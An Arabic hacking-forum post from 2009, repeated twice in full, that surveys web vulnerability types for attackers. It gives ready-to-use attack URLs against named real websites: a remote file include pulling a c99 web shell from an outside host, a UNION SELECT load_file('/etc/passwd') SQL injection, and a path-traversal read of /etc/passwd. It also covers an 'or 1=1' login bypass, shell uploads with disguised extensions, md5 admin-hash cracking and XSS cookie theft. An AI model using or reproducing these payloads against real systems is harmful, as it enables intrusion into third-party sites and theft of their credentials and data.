ASDELY-ScOrPiOn
07-23-2009, 11:04 AM
بسم الله الرحمن الرحيم
كيفكم اخواني انشا الله بخير
موضوعنا اليوم
نبذه عن معظم انواع الثغرات بإذن الله العظيم
بسم الله بدأنآ
1 - ثغرات ريموت فايل انكلود Remot File include
طبعا من اشهر انواع الثغرات
سببها ،، قيام المبرمج بعمل خطأ فادح, وهو السماح لدالة انكلود
بأن تقوم بأستدعاء اى ملف وليس ملف محدد , ومنها يمكن للمخرب ان يقوم بأستدعاء ملف خارجى
كالشيل مثلا s1
لكن قليلة في وقتنا هذ1
طبعا الثغرة بتسمح لك ادراج ملف من خارج الموقع وهذا الملف بكون عبارة عن شيل s1
خلينا نشوف مثال
http://www.insights.co.il/site.php?page=http://shaja.jeeran.com/c99.txt?
معنا الموقع هذا
الملف المصاب site.php
المتغير المصاب ?page
=http://shaja.jeeran.com/c99.txt
رابط الشيل اللي هندرجو داخل الموقع
عن طريق الملف + المتغير المصاب
طبعآ لاننسى علامة الاستفهام ؟
انتهيها من النوع الأول
---------------------------------------------
2- SQL injection سكيول انجكشن
طبعا تنقسم الى قسمين SQL injection php وهو الحقن في ملفات الـ php
و SQL injection asp الحقن في ملفات asp يعني سيرفرات الويندوز والمواقع اللتي تستخدم ملفات asp
توضيح :
وهي ثغرات الحقن في قواعد البيانات
خطورة الثغرة خطيرة جدآ
لانها تسمح للمخترق بإستخراج بيانات المدير العام (admin)
وتسمح بحقن شيل في احدى المجلدات المصرحة مثل tmp/ images ...الخ
مثال على موقع مصاب بثغرة الحقن
http://www.dtincr.ph/news.php?id=1
لاحظ لو اضفت بعد المتغير 1 علامة '
فلاحظ وجود الخطأ
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /home/dtincr/public_html/news.php on line 20
طبعا هذا خطأ سكيول
خلينا نشرح عنه شوية
اللي بهمنا news.php?id=1
news.php الملف المصاب
?id=1 المتغير المصاب
طبعا بيكون اكثر من رقم واحد
مثال ?id=42 ...الخ
مثال حي على استغلال ثغرة سكيول انجكشن
http://faganmedia.com/profile.php?id=%27+UNION+SELECT+1,2,3,4,5,load_fil e(%27/etc/passwd%27),7,8,9 (http://faganmedia.com/profile.php?id=%27+UNION+SELECT+1,2,3,4,5,load_fil e(%27/etc/passwd%27),7,8,9)--+
طبعا قمت باستغلال امر load_file وقرأت اليوزرات والمسارات للسيرفر عن طريق الامر etc/passwd
'طبعا الماجيك كوتس اوف لو انو اون كان ماعرفت أقرأ شي
شرح من الاخ Red-D3v1L
لاكتشاف واستغلال ثغرات الـ sql
http://www.4shared.com/file/101817977/f7f91468/SQL_ExPloit.html
انتهينا من ثغرات الحقن
------------------------------------------
3 - ثغرات اللوكال فايل انكلود local file include
طبعا هذه الثغرة تسمح لك بقراءة ملفات من السيرفر s1
مثل ملف الشادو المهم lol
مثال على قرآءة امر استخراج يوزرات ومسارات السيرفر
http://www.museumsinsel-berlin.de/in.../../etc/passwd (http://www.museumsinsel-berlin.de/index.php?lang=../../../../../../../etc/passwd)
طبعا الملف المصاب index.php
المتغير المصاب ?lang
وقدرنا نستغلو ونقرأ الأمر
انتهى الشرح للنوع الثالث
----------------------------------------------------------
4- ثغرات Remot file upload
طبعا هذا النوع سهل جدا
تسمح لك بادراج ملف
عبارة عن رفع ملف شيل باكثر من صيغة في مراكز التحميل
طبعا شفنا اكثر من ثغرة في مراكر التحميل العربية ولن اتطرق لوضع مثال
طبعا الثغرة بتسمح لك برفع ملف
ويجب عليك انك تشغل مخك
يعني مثلا عندنا مركز تحميل مايقبل صيغة php
نروح نجرب نرفع بامتداد rar
يعني يكون الامتداد كذ1 c99.php.rar
أو c99.php.gif
طبعا بأكثر من امتداد
ومش شرط ان الثغرة تكون في مركز التحميل فقط
احتمال لما تسجل بالموقع تروح ترفع شيل بدل الصورة في ملفك الشخصي lol
مثل ثغرة الـ phpizabi
انتيهنا من النوع الرابع ..
------------------------------------
5-ثغرات الـ Bypass
من اسهل الثغرات الموجودة
بتستطيع تدخل على اللوحة بدون الباسورد وبدون اليوزر
عن طريق ادراج رموز مثل or '1=1
طيب الرموز المستخدمة كثير ة
عن استغلال ثغرات الباي بآس
http://www.4shared.com/file/101822143/a5d458e8/Bypass.html
انتهينا من الشرح
.................................................. .
6- Database Backup Dump Vulnerability
ثغرات خطيرة جدا
وتسمح لك بنسخ قواعد البيانات كاملة
طبعا لما تحمل قواعد البيانات
رح تلاقي بآسورد المدير + الاعضاء مشفر بمقياس md5
وطبعا مواقع الفك كثيرة
انتهينا من النوع السادس
------------------------------------------------
7- Remote Admin Password Change
طبعا النوع هذا مشهور جدا
وطبعا الثغرة بتسمح لك بتغير باسورد مدير الموقع بدون الحاجة للباسورد القديم
طبعا المثال الحي ثغرة token joomla
الجميع بيعرفها بتقدر تغير باسورد الادمن باستخدام ' رمز التوكن
انتهينا من النوع السابع
-------------------------------------------------
8- perl exploit
وهي الثغرات اللي بتكون مكتوبة بلغة البيرل
طبعا بتقولولي كيف نعرف انو الثغرة مكتوبة بلغة البيرل
بقوللكم
ملفات البيرل بكون امتدادها مثل
exploit.pl
او مثلا ازا رحت موقع سيكيورتي ولقيت بداية الثغرة هالكود
#!/usr/bin/perl
اعرف على السريع انو الثغرة مكتوبة بلغة البيرل
استغلالها
لازم تكون منزل على جهازك مترجم البيرل ActivePerl
حتى يترجم ثغرات البيرل
طبعا الاستغلال بكون
حفظ الثغرة بامتداد .pl
مثلا Sec-t.pl
طبعا البرنامج رح تنصب بالمسار هذا
c:/perl
بعد ما نحفظ الثغر ة
نروح نضع ملف Sec-t.pl
c:/perl/bin
بعد هيك نروح للدوس cmd
cd
وندخل لقرص c
بعدها نتجه بالامر
cd perl
يصبح مسارنا
c:/perl
بعدها
cd bin
رح يصبح مسارنا
C:/pel/bin
بعدها شغل الثغرة بامر
perl Sec-t.pl
بعدها رح يعطيك كيفية استخدام الثغرة
انتهى شرح النوع الثامن
------------------------------------------
9- ثغرات File Disclosure
تستطيع من خلالها قراءة اي ملف من الموقع
انتهى الشرح للنوع التاسع
-----------------------------------
10- ثغرات xxs Cross-Site Scripting
وهي الثغرات اللي تستطيع من خلالها سحب الكوكيز الخاص بالضحية
وتحليله عن طريق برنامج cookies editor
عبر كود معين والأكواد المختصة كثيرة ماشا الله
وشركة الهوتميل مشهورة بثغرات الـ xxs
انتهى الشرح للنوع العاشر
--------------------------------------------
11- ثغرات Command Execution
وهى كذلك مشابه لثغرات الفايل انكلود ولكن الاختلاف انك تكتب اوامر لين**
على المتصفح بعد الاستغلال وتشبه ثغرات اللوكال انكلود s1
لانك تقدر تقرأ ملفات من السيرفر
-----------------------------
12- Buffer overflow ثغرات
الفيض overflow
الفيض هو الزياده عن تحمل الشيء او انك تزيد عن شي فوق المسموح
لبفر اوفر فلو عباره عن خطأ برمجي او نقص برمجي بالاصح يغفل عنه مصمم برنامج
يسمح لك هذا الخطاء او النقص البرمجي انك تعمل تحكم في الذاكره
عندما تدخل بيانات تفوق البفر الموجود في الذاكره مثل العمليه التي قمنا بها في الاوفر فلو
لذلك سميت buffer overflow
والبفر تحدث في حين المبرمج يعطي سماح لأدخال شيء ويغفل عن اعطاء تحديد للشرط
فعند ادخال بيانات في المحدد يحدث هنا البفر
هذا كان توضيح فقط عن ثغرات البفر اوفر فلو
-------------------------------------------------
كيفكم اخواني انشا الله بخير
موضوعنا اليوم
نبذه عن معظم انواع الثغرات بإذن الله العظيم
بسم الله بدأنآ
1 - ثغرات ريموت فايل انكلود Remot File include
طبعا من اشهر انواع الثغرات
سببها ،، قيام المبرمج بعمل خطأ فادح, وهو السماح لدالة انكلود
بأن تقوم بأستدعاء اى ملف وليس ملف محدد , ومنها يمكن للمخرب ان يقوم بأستدعاء ملف خارجى
كالشيل مثلا s1
لكن قليلة في وقتنا هذ1
طبعا الثغرة بتسمح لك ادراج ملف من خارج الموقع وهذا الملف بكون عبارة عن شيل s1
خلينا نشوف مثال
http://www.insights.co.il/site.php?page=http://shaja.jeeran.com/c99.txt?
معنا الموقع هذا
الملف المصاب site.php
المتغير المصاب ?page
=http://shaja.jeeran.com/c99.txt
رابط الشيل اللي هندرجو داخل الموقع
عن طريق الملف + المتغير المصاب
طبعآ لاننسى علامة الاستفهام ؟
انتهيها من النوع الأول
---------------------------------------------
2- SQL injection سكيول انجكشن
طبعا تنقسم الى قسمين SQL injection php وهو الحقن في ملفات الـ php
و SQL injection asp الحقن في ملفات asp يعني سيرفرات الويندوز والمواقع اللتي تستخدم ملفات asp
توضيح :
وهي ثغرات الحقن في قواعد البيانات
خطورة الثغرة خطيرة جدآ
لانها تسمح للمخترق بإستخراج بيانات المدير العام (admin)
وتسمح بحقن شيل في احدى المجلدات المصرحة مثل tmp/ images ...الخ
مثال على موقع مصاب بثغرة الحقن
http://www.dtincr.ph/news.php?id=1
لاحظ لو اضفت بعد المتغير 1 علامة '
فلاحظ وجود الخطأ
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /home/dtincr/public_html/news.php on line 20
طبعا هذا خطأ سكيول
خلينا نشرح عنه شوية
اللي بهمنا news.php?id=1
news.php الملف المصاب
?id=1 المتغير المصاب
طبعا بيكون اكثر من رقم واحد
مثال ?id=42 ...الخ
مثال حي على استغلال ثغرة سكيول انجكشن
http://faganmedia.com/profile.php?id=%27+UNION+SELECT+1,2,3,4,5,load_fil e(%27/etc/passwd%27),7,8,9 (http://faganmedia.com/profile.php?id=%27+UNION+SELECT+1,2,3,4,5,load_fil e(%27/etc/passwd%27),7,8,9)--+
طبعا قمت باستغلال امر load_file وقرأت اليوزرات والمسارات للسيرفر عن طريق الامر etc/passwd
'طبعا الماجيك كوتس اوف لو انو اون كان ماعرفت أقرأ شي
شرح من الاخ Red-D3v1L
لاكتشاف واستغلال ثغرات الـ sql
http://www.4shared.com/file/101817977/f7f91468/SQL_ExPloit.html
انتهينا من ثغرات الحقن
------------------------------------------
3 - ثغرات اللوكال فايل انكلود local file include
طبعا هذه الثغرة تسمح لك بقراءة ملفات من السيرفر s1
مثل ملف الشادو المهم lol
مثال على قرآءة امر استخراج يوزرات ومسارات السيرفر
http://www.museumsinsel-berlin.de/in.../../etc/passwd (http://www.museumsinsel-berlin.de/index.php?lang=../../../../../../../etc/passwd)
طبعا الملف المصاب index.php
المتغير المصاب ?lang
وقدرنا نستغلو ونقرأ الأمر
انتهى الشرح للنوع الثالث
----------------------------------------------------------
4- ثغرات Remot file upload
طبعا هذا النوع سهل جدا
تسمح لك بادراج ملف
عبارة عن رفع ملف شيل باكثر من صيغة في مراكز التحميل
طبعا شفنا اكثر من ثغرة في مراكر التحميل العربية ولن اتطرق لوضع مثال
طبعا الثغرة بتسمح لك برفع ملف
ويجب عليك انك تشغل مخك
يعني مثلا عندنا مركز تحميل مايقبل صيغة php
نروح نجرب نرفع بامتداد rar
يعني يكون الامتداد كذ1 c99.php.rar
أو c99.php.gif
طبعا بأكثر من امتداد
ومش شرط ان الثغرة تكون في مركز التحميل فقط
احتمال لما تسجل بالموقع تروح ترفع شيل بدل الصورة في ملفك الشخصي lol
مثل ثغرة الـ phpizabi
انتيهنا من النوع الرابع ..
------------------------------------
5-ثغرات الـ Bypass
من اسهل الثغرات الموجودة
بتستطيع تدخل على اللوحة بدون الباسورد وبدون اليوزر
عن طريق ادراج رموز مثل or '1=1
طيب الرموز المستخدمة كثير ة
عن استغلال ثغرات الباي بآس
http://www.4shared.com/file/101822143/a5d458e8/Bypass.html
انتهينا من الشرح
.................................................. .
6- Database Backup Dump Vulnerability
ثغرات خطيرة جدا
وتسمح لك بنسخ قواعد البيانات كاملة
طبعا لما تحمل قواعد البيانات
رح تلاقي بآسورد المدير + الاعضاء مشفر بمقياس md5
وطبعا مواقع الفك كثيرة
انتهينا من النوع السادس
------------------------------------------------
7- Remote Admin Password Change
طبعا النوع هذا مشهور جدا
وطبعا الثغرة بتسمح لك بتغير باسورد مدير الموقع بدون الحاجة للباسورد القديم
طبعا المثال الحي ثغرة token joomla
الجميع بيعرفها بتقدر تغير باسورد الادمن باستخدام ' رمز التوكن
انتهينا من النوع السابع
-------------------------------------------------
8- perl exploit
وهي الثغرات اللي بتكون مكتوبة بلغة البيرل
طبعا بتقولولي كيف نعرف انو الثغرة مكتوبة بلغة البيرل
بقوللكم
ملفات البيرل بكون امتدادها مثل
exploit.pl
او مثلا ازا رحت موقع سيكيورتي ولقيت بداية الثغرة هالكود
#!/usr/bin/perl
اعرف على السريع انو الثغرة مكتوبة بلغة البيرل
استغلالها
لازم تكون منزل على جهازك مترجم البيرل ActivePerl
حتى يترجم ثغرات البيرل
طبعا الاستغلال بكون
حفظ الثغرة بامتداد .pl
مثلا Sec-t.pl
طبعا البرنامج رح تنصب بالمسار هذا
c:/perl
بعد ما نحفظ الثغر ة
نروح نضع ملف Sec-t.pl
c:/perl/bin
بعد هيك نروح للدوس cmd
cd
وندخل لقرص c
بعدها نتجه بالامر
cd perl
يصبح مسارنا
c:/perl
بعدها
cd bin
رح يصبح مسارنا
C:/pel/bin
بعدها شغل الثغرة بامر
perl Sec-t.pl
بعدها رح يعطيك كيفية استخدام الثغرة
انتهى شرح النوع الثامن
------------------------------------------
9- ثغرات File Disclosure
تستطيع من خلالها قراءة اي ملف من الموقع
انتهى الشرح للنوع التاسع
-----------------------------------
10- ثغرات xxs Cross-Site Scripting
وهي الثغرات اللي تستطيع من خلالها سحب الكوكيز الخاص بالضحية
وتحليله عن طريق برنامج cookies editor
عبر كود معين والأكواد المختصة كثيرة ماشا الله
وشركة الهوتميل مشهورة بثغرات الـ xxs
انتهى الشرح للنوع العاشر
--------------------------------------------
11- ثغرات Command Execution
وهى كذلك مشابه لثغرات الفايل انكلود ولكن الاختلاف انك تكتب اوامر لين**
على المتصفح بعد الاستغلال وتشبه ثغرات اللوكال انكلود s1
لانك تقدر تقرأ ملفات من السيرفر
-----------------------------
12- Buffer overflow ثغرات
الفيض overflow
الفيض هو الزياده عن تحمل الشيء او انك تزيد عن شي فوق المسموح
لبفر اوفر فلو عباره عن خطأ برمجي او نقص برمجي بالاصح يغفل عنه مصمم برنامج
يسمح لك هذا الخطاء او النقص البرمجي انك تعمل تحكم في الذاكره
عندما تدخل بيانات تفوق البفر الموجود في الذاكره مثل العمليه التي قمنا بها في الاوفر فلو
لذلك سميت buffer overflow
والبفر تحدث في حين المبرمج يعطي سماح لأدخال شيء ويغفل عن اعطاء تحديد للشرط
فعند ادخال بيانات في المحدد يحدث هنا البفر
هذا كان توضيح فقط عن ثغرات البفر اوفر فلو
-------------------------------------------------